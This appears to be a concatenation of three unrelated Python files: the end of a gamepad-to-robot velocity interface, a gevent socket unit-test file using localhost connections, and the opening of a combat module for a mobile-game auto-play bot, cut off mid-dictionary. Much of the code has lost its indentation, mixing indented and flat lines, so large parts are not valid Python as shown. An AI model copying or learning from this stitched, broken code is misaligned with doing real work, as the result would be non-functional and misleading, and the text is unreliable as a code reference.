                                # self.lin_vel = -0.5*(event.state-128)/128
                                # self.changed = True
                                continue
                            elif event.code == "ABS_Z":
                                self.ang_vel = -6.28*(event.state-128)/128
                                self.changed = True
                        finally:
                            self.rate_mutex.release()
            except Exception:
                print("Game pad error! Disconnecting")
                break
        self.is_running = False
def process_callbacks(self):
while self.is_running:
try:
self.rate_mutex.acquire()
if time.perf_counter() - self.last_send_time > 0.1 and self.changed:
self.callback_list_mutex.acquire()
try:
if abs(self.ang_vel) < 0.01:
self.ang_vel = 0
if abs(self.lin_vel) < 0.01:
self.lin_vel = 0
for function in self.cbk_list:
function(self.lin_vel, self.ang_vel)
finally:
self.callback_list_mutex.release()
self.last_send_time = time.perf_counter()
self.changed = False
finally:
self.rate_mutex.release()
time.sleep(0.03)
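    # Design note for the loop above: callbacks fire at most every 0.1 s and
    # only when an axis value changed, with a +/-0.01 deadband snapping stick
    # noise to zero; rate_mutex guards lin_vel/ang_vel against the event
    # thread, while callback_list_mutex protects the callback list itself.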
def print_check(lin, ang):
    print("Lin: " + str(lin) + " Ang: " + str(ang))
def main():
    # devices.gamepads[0]      # unused probe
    # events = get_gamepad()   # unused; would block until the first event arrives
    interface = MEGN540_GamePadInterface()
    interface.add_callback(print_check)
    interface.connect()
    while interface.is_connected():
        time.sleep(0.1)  # yield instead of busy-spinning the CPU
if __name__ == "__main__":
main()
|
test__socket.py
|
from gevent import monkey; monkey.patch_all()
import sys
import os
import array
import socket
import traceback
import time
import unittest
import greentest
from functools import wraps
from greentest import six
from greentest import LARGE_TIMEOUT
# we use threading on purpose so that we can test both regular and gevent sockets with the same code
from threading import Thread as _Thread
errno_types = int
def wrap_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except: # pylint:disable=bare-except
traceback.print_exc()
os._exit(2)
return wrapper
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
target = wrap_error(target)
_Thread.__init__(self, target=target, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
self.listener = self._close_on_teardown(self._setup_listener())
# XXX: On Windows (at least with libev), if we have a cleanup/tearDown method
# that does 'del self.listener' AND we haven't sometime
# previously closed the listener (while the test body was executing)
# we tend to sometimes see hangs when tests run in succession;
# notably test_empty_send followed by test_makefile produces a hang
# in test_makefile when it tries to read from the client_file, because
# the accept() call in accept_once has not yet returned a new socket to
# write to.
# The cause *seems* to be that the listener socket in both tests gets the
# same fileno(); or, at least, if we don't del the listener object,
# we get a different fileno, and that scenario works.
# Perhaps our logic is wrong in libev_vfd in the way we use
# _open_osfhandle and determine we can close it?
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
listener = socket.socket()
greentest.bind_and_listen(listener, ('127.0.0.1', 0))
return listener
def create_connection(self, host='127.0.0.1', port=None, timeout=None,
blocking=None):
sock = socket.socket()
sock.connect((host, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return self._close_on_teardown(sock)
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
read_data = []
server_exc_info = []
def accept_and_read():
conn = None
try:
conn, _ = self.listener.accept()
r = conn.makefile(mode='rb')
read_data.append(r.read())
r.flush()
r.close()
except: # pylint:disable=bare-except
server_exc_info.append(sys.exc_info())
finally:
if conn:
conn.close()
self.listener.close()
server = Thread(target=accept_and_read)
client = self.create_connection(**client_args)
try:
getattr(client, client_method)(data)
finally:
client.shutdown(socket.SHUT_RDWR)
client.close()
server.join()
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data[0], match_data)
if server_exc_info:
six.reraise(*server_exc_info[0])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if not six.PY3:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
(remote_client, _) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
def sendall():
remote_client.sendall(b't' * N)
sender = Thread(target=sendall)
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
sender.join()
remote_client.close()
self.listener.close()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = client.makefile()
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
client.settimeout(1)
start = time.time()
self.assertRaises(self.TIMEOUT_ERROR, client.recv, 1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
acceptor.join()
client.close()
client_sock[0][0].close()
# On Windows send() accepts whatever is thrown at it
if sys.platform != 'win32':
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
_test_sendall_data = b'hello' * 1000000
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
self.assertRaises(self.TIMEOUT_ERROR, client.sendall, self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
assert 0.09 <= took <= 0.2, took
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
self.listener.close()
acceptor = Thread(target=accept_once)
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
acceptor.join()
    def test_attributes(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
        # AF_INET is the address family and SOCK_DGRAM the socket type (the
        # swapped checks only passed because both constants equal 2 on Linux)
        self.assertEqual(socket.AF_INET, s.family)
        self.assertEqual(socket.SOCK_DGRAM, s.type)
        self.assertEqual(0, s.proto)
        if hasattr(socket, 'SOCK_NONBLOCK'):
            s.settimeout(1)
            self.assertEqual(socket.SOCK_DGRAM, s.type)
            s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, get_port()))
self.assertIsInstance(ret, errno_types)
s.close()
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', get_port()))
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
s.connect(('127.0.0.1', self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
acceptor.join()
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
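# Note: this bind-then-close probe is a common but inherently racy way to pick
# a free port (another process could claim it before the test uses it); the
# tests below only need a port that is very likely closed or free, so the race
# is acceptable here.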
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self):
with self.assertRaises(socket.error) as cm:
socket.create_connection((greentest.DEFAULT_BIND_ADDR, get_port()),
timeout=30,
source_address=('', get_port()))
ex = cm.exception
self.assertIn('refused', str(ex).lower())
@greentest.ignores_leakcheck
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E()
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gevent.socket.timeout):
gevent.socket.wait(io(), timeout=0.01)
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
combat.py
|
import math
import string
from datetime import datetime, timedelta
from util.logger import Logger
from util.utils import Region, Utils
from scipy import spatial
from threading import Thread
class CombatModule(object):
def __init__(self, config, stats, retirement_module, enhancement_module):
"""Initializes the Combat module.
Args:
config (Config): ALAuto Config instance.
stats (Stats): ALAuto Stats instance.
retirement_module (RetirementModule): ALAuto RetirementModule instance.
enhancement_module (EnhancementModule): ALAuto EnhancementModule instance.
"""
self.enabled = True
self.config = config
self.stats = stats
self.retirement_module = retirement_module
self.enhancement_module = enhancement_module
self.chapter_map = self.config.combat['map']
Utils.small_boss_icon = config.combat['small_boss_icon']
self.exit = 0
self.combats_done = 0
self.enemies_list = []
self.mystery_nodes_list = []
self.blacklist = []
self.movement_event = {}
self.kills_count = 0
self.kills_before_boss = {
'1-1': 1, '1-2': 2, '1-3': 2, '1-4': 3,
'2-1': 2, '2-2': 3, '2-3': 3, '2-4': 3,
'3-1': 3, '3-2': 3, '3-3': 3, '3-4': 3,
'4-1': 3, '4-2': 3, '4-3': 3, '4-4': 4,
'5-1': 4, '5-2': 4, '5-3': 4, '5-4': 4,
'6-1': 4, '6-2': 4, '6-3': 4, '6-4': 5,
'7-1': 5, '7-2': 5, '7-3': 5, '7-4': 5,
'8-1': 4, '8-2': 4, '8-3': 4, '8-4': 4,
'9-1': 5, '9-2': 5, '9-3': 5, '9-4': 5,
'10-1': 6, '10-2': 6, '10-3': 6, '10-4': 6,
'11-1': 6, '11-2': 6, '11-3': 6, '11-4': 6,
'12-1': 6, '12-2': 6, '12-3': 6, '12-4': 6,
'13-1': 6, '13-2': 6, '13-3': 6, '13-4': 7
}
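        # Keys above are "<world>-<stage>" map identifiers and the values are
        # the number of mob fleets that (presumably, per the game's spawn
        # rules) must be sunk before the boss appears; unknown maps fall back
        # to the configured value handled below.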
        if self.chapter_map not in self.kills_before_boss:
            # the current map is not in the dictionary: add an entry for it
            # using the configured kills_before_boss value
            self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
        elif self.config.combat['kills_before_boss'] != 0:
            # override the default with the value provided by the user
            self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
self.region = {
'fleet_lock': Region(1790, 750, 130, 30),
'open_strategy_menu': Region(1797, 617, 105, 90),
'disable_subs_hunting_radius': Region(1655, 615, 108, 108),
'close_strategy_menu': Region(1590, 615, 40, 105),
'menu_button_battle': Region(1517, 442, 209, 206),
'map_summary_go': Region(1289, 743, 280, 79),
'fleet_menu_go': Region(1485, 872, 270, 74),
'combat_ambush_evade': Region(1493, 682, 208, 56),
'combat_com_confirm': Region(848, 740, 224, 56),
'combat_end_confirm': Region(1520, 963, 216, 58),
'combat_dismiss_surface_fleet_summary': Region(790, 950, 250, 65),
'menu_combat_start': Region(1578, 921, 270, 70),
'tap_to_continue': Region(661, 840, 598, 203),
'close_info_dialog': Region(1326, 274, 35, 35),
'dismiss_ship_drop': Region(1228, 103, 692, 735),
'retreat_button': Region(1130, 985, 243, 60),
'dismiss_commission_dialog': Region(1065, 732, 235, 68),
'normal_mode_button': Region(88, 990, 80, 40),
'map_nav_right': Region(1831, 547, 26, 26),
'map_nav_left': Region(65, 547, 26, 26),
'event_button': Region(1770, 250, 75, 75),
'lock_ship_button': Region(1086, 739, 200, 55),
'clear_second_fleet': Region(1690, 473, 40, 40),
'button_switch_fleet': Region(1430, 985, 240, 60),
'menu_nav_back': Region(54, 57, 67, 67)
}
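        # The Region(x, y, width, height) boxes above define tap/search areas
        # in what appears to be a 1920x1080 screen space; Region itself comes
        # from util.utils and is assumed, not redefined, here.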
self.swipe_counter = 0
def combat_logic_wrapper(self):
"""Method that fires off the necessary child methods that encapsulates
the entire action of sortieing combat fleets and resolving combat.
Returns:
int: 1 if boss was defeated, 2 if successfully retreated after the specified
number of fights, 3 if morale is too low, 4 if dock is full and unable to
free it and 5 if fleet was defeated.
"""
self.exit = 0
self.start_time = datetime.now()
        # enhancement and retirement flags
enhancement_failed = False
retirement_failed = False
# get to map
map_region = self.reach_map()
Utils.touch_randomly(map_region)
while True:
Utils.wait_update_screen()
if self.exit == 1 or self.exit == 2:
self.stats.increment_combat_done()
time_passed = datetime.now() - self.start_time
if self.stats.combat_done % self.config.combat['retire_cycle'] == 0 or ((self.config.commissions['enabled'] or \
self.config.dorm['enabled'] or self.config.academy['enabled']) and time_passed.total_seconds() > 3600) or \
not Utils.check_oil(self.config.combat['oil_limit']):
break
else:
self.exit = 0
Logger.log_msg("Repeating map {}.".format(self.chapter_map))
Utils.touch_randomly(map_region)
continue
if self.exit > 2:
self.stats.increment_combat_attempted()
break
if Utils.find("combat/button_go", 0.93):
Logger.log_debug("Found map summary go button.")
Utils.touch_randomly(self.region["map_summary_go"])
Utils.wait_update_screen()
if Utils.find("combat/menu_fleet") and (lambda x:x > 414 and x < 584)(Utils.find("combat/menu_fleet").y) and not self.config.combat['boss_fleet']:
if not self.chapter_map[0].isdigit() and string.ascii_uppercase.index(self.chapter_map[2:3]) < 1 or self.chapter_map[0].isdigit():
Logger.log_msg("Removing second fleet from fleet selection.")
Utils.touch_randomly(self.region["clear_second_fleet"])
if Utils.find("combat/menu_select_fleet"):
Logger.log_debug("Found fleet select go button.")
Utils.touch_randomly(self.region["fleet_menu_go"])
Utils.wait_update_screen(2)
if Utils.find("combat/button_retreat"):
Logger.log_debug("Found retreat button, starting clear function.")
if not self.clear_map():
self.stats.increment_combat_attempted()
break
Utils.wait_update_screen()
if Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
# reset enhancement flag
enhancement_failed = False
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
break
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
break
Utils.script_sleep(1)
Utils.menu_navigate("menu/button_battle")
return self.exit
def reach_map(self):
"""
Method which returns the map region for the stage set in the configuration file.
If the map isn't found, it navigates the map selection menu to get to the world where the specified map is located.
Only works with standard maps up to worlds 13 and some event maps.
        Also checks whether hard mode is enabled and whether it is valid to keep it enabled (event maps C and D).
If nothing is found even after menu navigation, it stops the bot workflow until the user moves to the right
screen or the map asset is substituted with the right one.
Returns:
(Region): the map region of the selected stage.
"""
Utils.wait_update_screen()
# get to map selection menu
if Utils.find("menu/button_battle"):
Logger.log_debug("Found menu battle button.")
Utils.touch_randomly(self.region["menu_button_battle"])
Utils.wait_update_screen(2)
# correct map mode
if not self.chapter_map[0].isdigit():
letter = self.chapter_map[2]
event_maps = ['A', 'B', 'S', 'C', 'D']
Utils.touch_randomly(self.region['event_button'])
Utils.wait_update_screen(1)
            if (event_maps.index(letter) < 3 and Utils.find("menu/button_normal_mode", 0.8)) or \
                    (event_maps.index(letter) > 2 and not Utils.find("menu/button_normal_mode", 0.8)):
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
else:
if Utils.find("menu/button_normal_mode"):
Logger.log_debug("Disabling hard mode.")
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
        if map_region is not None:
Logger.log_msg("Found specified map.")
return map_region
else:
# navigate map selection menu
if not self.chapter_map[0].isdigit():
if (self.chapter_map[2] == 'A' or self.chapter_map[2] == 'C') and \
(Utils.find('maps/map_E-B1', 0.99) or Utils.find('maps/map_E-D1', 0.99)):
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
elif (self.chapter_map[2] == 'B' or self.chapter_map[2] == 'D') and \
(Utils.find('maps/map_E-A1', 0.99) or Utils.find('maps/map_E-C1', 0.99)):
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
else:
_map = 0
for x in range(1, 14):
if Utils.find("maps/map_{}-1".format(x), 0.99):
_map = x
break
if _map != 0:
taps = int(self.chapter_map.split("-")[0]) - _map
for x in range(0, abs(taps)):
if taps >= 1:
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
Utils.script_sleep()
else:
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
Utils.script_sleep()
Utils.wait_update_screen()
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
        if map_region is None:
            Logger.log_error("Cannot find the specified map, please move to the world where it's located.")
        while map_region is None:
            map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
            Utils.wait_update_screen(1)
Logger.log_msg("Found specified map.")
return map_region
def battle_handler(self, boss=False):
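        """Handles a fight from start to finish: starts combat, dismisses ship
        drops and info dialogs, tracks defeats and fleet switches, and returns
        True when the fight chain is won (or the boss is defeated), False when
        combat cannot proceed and a retreat is needed.
        """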
Logger.log_msg("Starting combat.")
        # enhancement and retirement flags
enhancement_failed = False
retirement_failed = False
        while not Utils.find("combat/menu_loading", 0.8):
Utils.update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
self.retreat_handler()
return False
elif Utils.find("combat/alert_morale_low"):
self.retreat_handler()
return False
elif Utils.find("combat/combat_pause", 0.7):
Logger.log_warning("Loading screen was not found but combat pause is present, assuming combat is initiated normally.")
break
else:
Utils.touch_randomly(self.region["menu_combat_start"])
Utils.script_sleep(1)
Utils.script_sleep(4)
# flags
in_battle = True
items_received = False
locked_ship = False
confirmed_fight = False
defeat = False
confirmed_fleet_switch = False
while True:
Utils.update_screen()
if in_battle and Utils.find("combat/combat_pause", 0.7):
Logger.log_debug("In battle.")
Utils.script_sleep(2.5)
continue
if not items_received:
if Utils.find("combat/menu_touch2continue"):
Logger.log_debug("Combat ended: tap to continue")
Utils.touch_randomly(self.region['tap_to_continue'])
in_battle = False
continue
if Utils.find("menu/item_found"):
Logger.log_debug("Combat ended: items received screen")
Utils.touch_randomly(self.region['tap_to_continue'])
Utils.script_sleep(1)
continue
if (not locked_ship) and Utils.find("combat/alert_lock"):
Logger.log_msg("Locking received ship.")
Utils.touch_randomly(self.region['lock_ship_button'])
locked_ship = True
continue
if Utils.find("menu/drop_elite"):
Logger.log_msg("Received ELITE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_rare"):
Logger.log_msg("Received new RARE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_ssr"):
Logger.log_msg("Received SSR ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_common"):
Logger.log_msg("Received new COMMON ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
if not in_battle:
if (not confirmed_fight) and Utils.find("combat/button_confirm"):
Logger.log_msg("Combat ended.")
items_received = True
confirmed_fight = True
Utils.touch_randomly(self.region["combat_end_confirm"])
if boss:
return True
Utils.wait_update_screen(3)
if (not confirmed_fight) and Utils.find("combat/commander"):
items_received = True
# prevents fleet with submarines from getting stuck at combat end screen
Utils.touch_randomly(self.region["combat_dismiss_surface_fleet_summary"])
continue
if defeat and not confirmed_fleet_switch:
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
Utils.script_sleep(3)
self.exit = 5
return False
if Utils.find("combat/alert_fleet_cannot_be_formed"):
# fleet will be automatically switched
Utils.touch_randomly(self.region['close_info_dialog'])
confirmed_fleet_switch = True
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
Utils.script_sleep(3)
continue
else:
# flagship sunk, but part of backline still remains
# proceed to retreat
Utils.script_sleep(3)
self.exit = 5
return False
if confirmed_fight and Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if confirmed_fight and Utils.find("combat/button_retreat"):
#Utils.touch_randomly(self.region["hide_strat_menu"])
if confirmed_fleet_switch:
# if fleet was defeated and it has now been switched
return False
else:
# fleet won the fight
self.combats_done += 1
self.kills_count += 1
if self.kills_count >= self.kills_before_boss[self.chapter_map]:
Utils.script_sleep(2.5)
return True
if confirmed_fight and Utils.find_and_touch("combat/defeat_close_button"):
Logger.log_debug("Fleet was defeated.")
defeat = True
Utils.script_sleep(3)
def movement_handler(self, target_info):
"""
        Method that handles the fleet movement until it reaches its target (mystery node or enemy node).
        If the coordinates are wrong, they are blacklisted and another set of coordinates to work on is obtained.
        If the target is a mystery node and what is found is ammo, the method falls into the blacklist case
        and searches for another enemy: this is inefficient and should be improved, but it works.
Args:
target_info (list): coordinate_x, coordinate_y, type. Describes the selected target.
Returns:
(int): 1 if a fight is needed, otherwise 0.
"""
Logger.log_msg("Moving towards objective.")
count = 0
location = [target_info[0], target_info[1]]
Utils.script_sleep(1)
while True:
Utils.update_screen()
event = self.check_movement_threads()
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/button_evade"]:
Logger.log_msg("Ambush was found, trying to evade.")
Utils.touch_randomly(self.region["combat_ambush_evade"])
Utils.script_sleep(0.5)
continue
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/alert_failed_evade"]:
Logger.log_warning("Failed to evade ambush.")
self.kills_count -= 1
Utils.touch_randomly(self.region["menu_combat_start"])
self.battle_handler()
continue
if self.chapter_map[0].isdigit() and event["combat/alert_ammo_supplies"]:
Logger.log_msg("Received ammo supplies")
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if self.chapter_map[0].isdigit() and event["menu/item_found"]:
Logger.log_msg("Item found on node.")
Utils.touch_randomly(self.region['tap_to_continue'])
if Utils.find("combat/menu_emergency"):
Utils.script_sleep(1)
Utils.touch_randomly(self.region["close_strategy_menu"])
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if event["menu/alert_info"]:
Logger.log_debug("Found alert.")
Utils.find_and_touch("menu/alert_close")
continue
if event["combat/menu_loading"]:
self.fleet_location = target_info[0:2]
return 1
elif event["combat/menu_formation"]:
Utils.find_and_touch("combat/auto_combat_off")
self.fleet_location = target_info[0:2]
return 1
else:
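                # No event fired: re-tap the destination every third pass and,
                # after 21 fruitless passes, blacklist it and pick a new target.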
if count != 0 and count % 3 == 0:
Utils.touch(location)
if count > 21:
Logger.log_msg("Blacklisting location and searching for another enemy.")
self.blacklist.append(location[0:2])
self.fleet_location = None
location = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
count = 0
count += 1
def unable_handler(self, coords, boss=False):
"""
Method called when the path to the target (boss fleet or mystery node) is obstructed by mobs:
        it proceeds to switch targets to the mobs which are blocking the path.
        Args:
            coords (list): coordinate_x, coordinate_y. These coordinates describe the target's location.
            boss (bool, optional): Defaults to False. True if the obstructed target is the boss fleet.
        Returns:
            (bool): True if the obstructing mobs were dealt with, False if the fleet must retreat.
"""
if boss:
Logger.log_debug("Unable to reach boss function started.")
else:
Logger.log_debug("Unable to reach selected target function started.")
self.blacklist.clear()
closest_to_unreachable_target = self.get_closest_target(self.blacklist, coords, boss=boss)
Utils.touch(closest_to_unreachable_target)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
Logger.log_warning("Unable to reach next to selected target.")
self.blacklist.append(closest_to_unreachable_target[0:2])
while True:
closest_enemy = self.get_closest_target(self.blacklist)
Utils.touch(closest_enemy)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
self.blacklist.append(closest_enemy[0:2])
else:
break
self.movement_handler(closest_enemy)
if not self.battle_handler():
return False
return True
else:
self.movement_handler(closest_to_unreachable_target)
if not self.battle_handler():
return False
return True
def retreat_handler(self):
""" Retreats if necessary.
"""
while True:
Utils.wait_update_screen(2)
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
continue
if Utils.find("menu/button_sort"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
continue
if Utils.find("combat/menu_formation"):
Utils.touch_randomly(self.region["menu_nav_back"])
continue
if Utils.find("combat/button_retreat"):
Utils.touch_randomly(self.region['retreat_button'])
continue
if Utils.find("menu/button_confirm"):
Utils.touch_randomly(self.region['combat_com_confirm'])
continue
if Utils.find("menu/attack"):
if self.exit != 1 and self.exit != 2 and self.exit != 5:
Logger.log_msg("Retreating...")
return
def clear_map(self):
""" Clears map.
"""
self.fleet_location = None
self.combats_done = 0
self.kills_count = 0
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.swipe_counter = 0
Logger.log_msg("Started map clear.")
Utils.script_sleep(2.5)
while Utils.find("combat/fleet_lock", 0.99):
Utils.touch_randomly(self.region["fleet_lock"])
Logger.log_warning("Fleet lock is not supported, disabling it.")
Utils.wait_update_screen()
#swipe map to fit everything on screen
swipes = {
'E-A2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-A3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-B3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'E-C2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-C3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-D3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'7-2': lambda: Utils.swipe(960, 540, 1300, 600, 300),
'12-2': lambda: Utils.swipe(1000, 570, 1300, 540, 300),
